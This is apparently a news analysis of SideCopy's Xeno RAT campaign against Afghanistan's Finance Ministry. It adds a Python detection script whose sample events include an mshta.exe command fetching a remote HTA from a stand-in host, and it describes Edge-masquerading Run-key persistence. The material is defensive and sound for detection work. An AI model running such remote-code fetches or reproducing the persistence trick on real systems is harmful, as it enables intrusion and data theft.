Pakistan-Linked SideCopy Targets Afghanistan Finance Ministry with Xeno RAT

The Hacker News, Jun 2, 2026

Why It Matters

The intrusion exposes critical Afghan financial data to a state‑aligned threat actor, heightening geopolitical cyber risk across South Asia. It underscores the need for hardened email defenses and rapid incident response in government ministries.

Key Takeaways

  • SideCopy used a Pashto‑named LNK file to lure Afghan finance officials
  • Campaign deployed Xeno RAT 1.8.7 with DLL loader and Edge mimic persistence
  • Operation XENOFISCAL expands Transparent Tribe’s focus from India to Afghanistan
  • Malware communicates via TCP, supports SOCKS5 tunneling and keystroke logging
  • Researchers warn of broader targeting of South Asian government entities

Pulse Analysis

The emergence of SideCopy’s Operation XENOFISCAL reflects a shifting cyber‑espionage playbook in South Asia, where threat groups increasingly tailor lures to local languages and bureaucratic structures. By naming the lure in Pashto and aligning it with the Finance Ministry’s paperwork, the actors show reconnaissance of Afghan governmental workflows, a tactic previously observed in attacks against Indian defense procurement channels. This cultural tailoring raises the bar for detection at the perimeter: a locally worded lure document contains nothing a signature‑based mail filter is tuned to recognize, so the first reliable signal is often the execution chain it triggers rather than the lure itself.

Technically, the campaign combines classic Windows shortcut abuse with modern persistence tricks. The LNK file invokes mshta.exe to fetch an HTA from a compromised education domain, and the HTA executes obfuscated JavaScript that drops Xeno RAT 1.8.7 via a DLL loader. The RAT establishes TCP command‑and‑control, supports SOCKS5 tunneling so operators can pivot through the infected host, and persists through a registry entry that masquerades as Microsoft Edge to survive reboots. Its capabilities (keylogging, screenshot capture, webcam access, and self‑deletion) equip operators to exfiltrate financial records, personnel data, and strategic policy documents while leaving little on disk once the job is done.
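The chain above leaves two observable traces on an endpoint before any C2 traffic: a script host (mshta.exe) reaching out to a remote URL, and a persistence entry under a Run key that borrows Microsoft Edge’s name. The following detection sketch is an added example, not code from The Hacker News, the researchers, or the campaign. It runs two rules over constructed Sysmon‑style events (EventID 1 process creation and EventID 13 registry value set). The URL, file names, SID and registry value names are made up for illustration, not indicators from the campaign, and the shape of the Edge‑mimic persistence (a Run‑key value named after Edge that does not point at the real msedge.exe) is an assumption about what “mimics Microsoft Edge in the registry” could look like.

```python
"""Added detection example: mshta.exe fetching a remote HTA, and a Run-key
value that names Microsoft Edge but points at a non-Edge binary.

The events below are constructed for illustration and carry no real
indicators from the SideCopy / Xeno RAT campaign."""

import re
from dataclasses import dataclass

# Any http(s) URL on the command line of a script host is the interesting bit.
HTTP_URL = re.compile(r"https?://\S+", re.IGNORECASE)

# HKCU/HKLM ...\CurrentVersion\Run and RunOnce autostart locations.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)

# Where the genuine Edge binary lives on a default install (assumption for
# this example; adjust if your fleet installs Edge elsewhere).
EDGE_BINARY = re.compile(
    r'^"?[A-Z]:\\Program Files( \(x86\))?\\Microsoft\\Edge\\Application\\msedge\.exe',
    re.IGNORECASE,
)


@dataclass
class Finding:
    rule: str
    event: dict


def check_process(ev: dict):
    """Rule 1: mshta.exe launched with a remote URL argument.

    A local HTA (e.g. a vendor installer) does not trigger; the page's chain
    is LNK -> mshta.exe -> HTA hosted on a compromised web server."""
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    if image.endswith("\\mshta.exe") and HTTP_URL.search(cmd):
        return Finding("mshta_remote_hta", ev)
    return None


def check_registry(ev: dict):
    """Rule 2: Run-key value whose name mentions Edge but whose data is not
    the real msedge.exe path. Legitimate Edge autostart entries point into
    the Edge application directory."""
    target = ev.get("TargetObject", "")
    details = ev.get("Details", "")
    if not RUN_KEY.search(target):
        return None
    value_name = target.rsplit("\\", 1)[-1]
    if "edge" in value_name.lower() and not EDGE_BINARY.match(details):
        return Finding("edge_masquerade_runkey", ev)
    return None


def scan(events):
    """Apply each rule to the events it applies to; return findings in order."""
    findings = []
    for ev in events:
        finding = None
        if ev.get("EventID") == 1:
            finding = check_process(ev)
        elif ev.get("EventID") == 13:
            finding = check_registry(ev)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry (not real campaign data). Order: one hit and
# one benign event per rule.
SAMPLE_EVENTS = [
    {   # LNK double-click: explorer.exe spawns mshta.exe with a remote HTA
        "EventID": 1,
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta.exe https://lure-host.example/docs/form.hta",
    },
    {   # Benign: mshta.exe running a local HTA shipped with an installer
        "EventID": 1,
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Program Files\Vendor\setup.exe",
        "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
    },
    {   # Suspicious: Edge-named Run value pointing into %APPDATA%
        "EventID": 13,
        "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdate",
        "Details": r"C:\Users\analyst\AppData\Roaming\EdgeUpdate\msedge.exe",
    },
    {   # Benign: genuine Edge auto-launch entry
        "EventID": 13,
        "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_A1B2",
        "Details": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window',
    },
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.event}")
```

Both rules deliberately key on behaviour rather than on the hash of a specific loader or HTA, which is the point of the passage: the lure language changes per target, but a script host pulling remote content and an autostart value that borrows a browser’s name are stable features of the chain. In production you would also correlate the two (same host, short time window) and treat the registry rule as lower severity on its own, since some third‑party updaters legitimately use Edge‑like names.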

For Afghan ministries and neighboring governments, the incident signals an urgent need to reinforce email hygiene, enforce multi‑factor authentication, and segment critical networks; because the chain runs through mshta.exe, restricting script hosts with application control on user workstations removes the first link directly. Threat intelligence sharing across the region can help identify similar lures before they reach end users. As Transparent Tribe expands its focus beyond India, stakeholders must adopt behavior‑based detection and regular red‑team exercises to anticipate culturally engineered attacks, thereby reducing the risk of sensitive fiscal information falling into hostile hands.
